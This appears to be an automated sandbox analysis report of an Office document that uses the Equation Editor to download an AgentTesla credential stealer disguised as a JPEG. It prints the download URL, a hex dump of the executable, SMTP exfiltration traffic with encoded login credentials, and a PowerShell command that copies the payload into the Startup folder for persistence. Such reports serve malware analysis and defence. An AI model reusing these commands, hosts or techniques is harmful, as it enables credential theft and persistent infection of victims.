                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 71 61 64 69 72 2e 74 69 63 6b 66 61 2e 69 72 2f 49 34 2f 52 46 5f 49 4d 47 5f 37 35 31 30 2e 6a 70 67 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://qadir.tickfa.ir/I4/RF_IMG_7510.jpg">moved here</a></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249168188.253.2.22180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 11:39:19.138669968 CET2OUTGET /I4/RF_IMG_7510.jpg HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Connection: Keep-Alive
                                                Host: qadir.tickfa.ir
                                                Feb 25, 2021 11:39:19.277499914 CET3INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 10:41:44 GMT
                                                Content-Type: image/jpeg
                                                Content-Length: 620032
                                                Last-Modified: Thu, 25 Feb 2021 07:22:38 GMT
                                                Connection: keep-alive
                                                ETag: "6037503e-97600"
                                                Accept-Ranges: bytes
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fd 4a 37 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 06 00 00 e0 02 00 00 00 00 00 9e b2 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c b2 06 00 4f 00 00 00 00 c0 06 00 2e dd 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 92 06 00 00 20 00 00 00 94 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e dd 02 00 00 c0 06 00 00 de 02 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 74 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b2 06 00 00 00 00 00 48 00 00 00 02 00 05 00 74 93 06 00 d8 1e 00 00 03 00 00 00 16 00 00 06 1c 2d 00 00 56 66 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 7e 16 00 00 04 28 23 00 00 0a 26 2a 36 00 72 af 00 00 70 28 3f 00 00 0a 26 2a 0a 00 2a 86 00 02 04 6f 65 00 00 0a 7d 12 00 00 04 02 04 6f 66 00 00 0a 7d 13 00 00 04 02 17 7d 19 00 00 04 2a c2 28 1b 00 00 06 72 81 01 00 70 28 13 00 00 06 80 11 00 00 04 7e 1d 00 00 04 7e 11 00 00 04 6f 70 00 00 0a 6f 71 00 00 0a 16 9a 80 16 00 00 04 2a 42 02 28 72 00 00 0a 00 00 02 28 14 00 00 06 00 2a 2e 28 7d 00 00 0a 80 1d 00 00 04 2a 22 00 28 03 00 00 06 00 2a 26 02 28 72 00 00 0a 00 00 2a 22 00 02 80 1f 00 00 04 2a 22 02 28 82 00 00 0a 00 2a 56 73 1d 00 00 06 28 83 00 00 0a 74 07 00 00 02 80 20 00 00 04 2a 00 00 13 30 03 00 83 00 00 00 00 00 00 00 02 14 7d 0a 00 00 04 02 28 14 00 00 0a 00 00 02 28 0a 00 00 06 00 02 7b 0b 00 00 04 72 01 00 00 70 6f 15 00 00 0a 00 02 7b 0c 00 00 04 16 6f 16 00 00 0a 00 02 16 7d 06 00 00 04 02 73 17 00 00 0a 7d 09 00 00 04 02 16 28 18 00 00 0a 72 1b 00 00 70 28 19 00 00 0a 7d 07 00 00 04 02 7b 07 00 00 04 28 1a 00 00 0a 26 02 02 7b 07 00 00 04 28 1b 00 00 0a 8e 69 7d 05 00 00 04 02 28 1c 00 00 0a 00 2a 00 13 30 03 00 63 01 00 00 01 00 00 11 00 02 7b 06 00 00 04 16 fe 01 0a 06 2c 66 00 02 02 73 0b 00 00 06 7d 08 00 00 04 02 7b 10 00 00 04 16 6f 16 00 00 0a 00 02 17 7d 06 00 00 04 02 7b 0b 00 00 04 72 45 00 00 70 6f 15 00 00 0a 00 02 7b 08 00 00 04 6f 1c 00 00 0a 00 02 7b 08 00 00 04 18 6f 1d 00 00 0a 00 02 7b 08 00 00 04 23 9a 99 99 99 99 99 c9 3f 6f 1e 00 00 0a 00 00 38 ee 00 00 00 02 7b 06 00 00 04 17 fe 01 0b 07 2c 6e 00 02 28 1f 00 00 0a 00 02 7b 0b 00 00 04 72 5d 00 00 70 6f
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJ7`0 @ @LO. H.text `.rsrc.@@.reloct@BHt-Vf6~(#&*6rp(?&**oe}of}}*(rp(~~opoq*B(r(*.(}*"(*&(r*"*"(*Vs(t *0}(({rpo{o}s}(rp(}{(&{(i}(*0c{,fs}{o}{rEpo{o{o{#?o8{,n({r]po


                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Feb 25, 2021 11:40:57.844799995 CET58749169198.54.126.101192.168.2.22220-server51.web-hosting.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 05:40:57 -0500
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Feb 25, 2021 11:40:57.844826937 CET58749169198.54.126.101192.168.2.22421 server51.web-hosting.com lost input connection
                                                Feb 25, 2021 11:41:10.948554993 CET58749170198.54.126.101192.168.2.22220-server51.web-hosting.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 05:41:10 -0500
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Feb 25, 2021 11:41:10.949114084 CET49170587192.168.2.22198.54.126.101EHLO 134349
                                                Feb 25, 2021 11:41:11.151621103 CET58749170198.54.126.101192.168.2.22250-server51.web-hosting.com Hello 134349 [84.17.52.78]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Feb 25, 2021 11:41:11.152858019 CET49170587192.168.2.22198.54.126.101AUTH login dGgzYm9va3NAbm9iZXR0d28ueHl6
                                                Feb 25, 2021 11:41:11.355530977 CET58749170198.54.126.101192.168.2.22334 UGFzc3dvcmQ6
                                                Feb 25, 2021 11:41:11.569895029 CET58749170198.54.126.101192.168.2.22235 Authentication succeeded
                                                Feb 25, 2021 11:41:11.570827961 CET49170587192.168.2.22198.54.126.101MAIL FROM:<th3books@nobettwo.xyz>
                                                Feb 25, 2021 11:41:11.773376942 CET58749170198.54.126.101192.168.2.22250 OK
                                                Feb 25, 2021 11:41:11.773749113 CET49170587192.168.2.22198.54.126.101RCPT TO:<th3books@nobettwo.xyz>
                                                Feb 25, 2021 11:41:11.978904963 CET58749170198.54.126.101192.168.2.22250 Accepted
                                                Feb 25, 2021 11:41:11.979283094 CET49170587192.168.2.22198.54.126.101DATA
                                                Feb 25, 2021 11:41:12.181705952 CET58749170198.54.126.101192.168.2.22354 Enter message, ending with "." on a line by itself
                                                Feb 25, 2021 11:41:12.205594063 CET49170587192.168.2.22198.54.126.101.
                                                Feb 25, 2021 11:41:12.412141085 CET58749170198.54.126.101192.168.2.22250 OK id=1lFE52-0038k8-32

                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:11:39:35
                                                Start date:25/02/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                Imagebase:0x13f520000
                                                File size:1424032 bytes
                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:39:36
                                                Start date:25/02/2021
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:39:38
                                                Start date:25/02/2021
                                                Path:C:\Users\Public\69577.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\Public\69577.exe
                                                Imagebase:0x1050000
                                                File size:620032 bytes
                                                MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000004.00000002.2091326557.0000000000CD0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000004.00000002.2092160168.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.2084130363.0000000000841000.00000004.00000001.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low

                                                General

                                                Start time:11:39:40
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Public\69577.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                                Imagebase:0x226a0000
                                                File size:452608 bytes
                                                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:11:39:41
                                                Start date:25/02/2021
                                                Path:C:\Users\Public\69577.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\Public\69577.exe
                                                Imagebase:0x1050000
                                                File size:620032 bytes
                                                MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2344628029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2345487869.00000000024F1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2345666525.000000000257A000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Start time:11:39:54
                                                Start date:25/02/2021
                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                                Imagebase:0xbe0000
                                                File size:620032 bytes
                                                MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000008.00000002.2123950202.0000000000B10000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000003.2116679901.00000000006D0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000008.00000002.2125712002.0000000003289000.00000004.00000001.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                Reputation:low

                                                General

                                                Start time:11:39:55
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                                                Imagebase:0x221c0000
                                                File size:452608 bytes
                                                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:11:39:57
                                                Start date:25/02/2021
                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                                Imagebase:0xbe0000
                                                File size:620032 bytes
                                                MD5 hash:3A89CF2D6D2449EF1A9640AF29F3A782
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2344624346.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2345285043.00000000023C1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2345285043.00000000023C1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2345347245.000000000244A000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2345347245.000000000244A000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                Disassembly

                                                Code Analysis

                                                Reset < >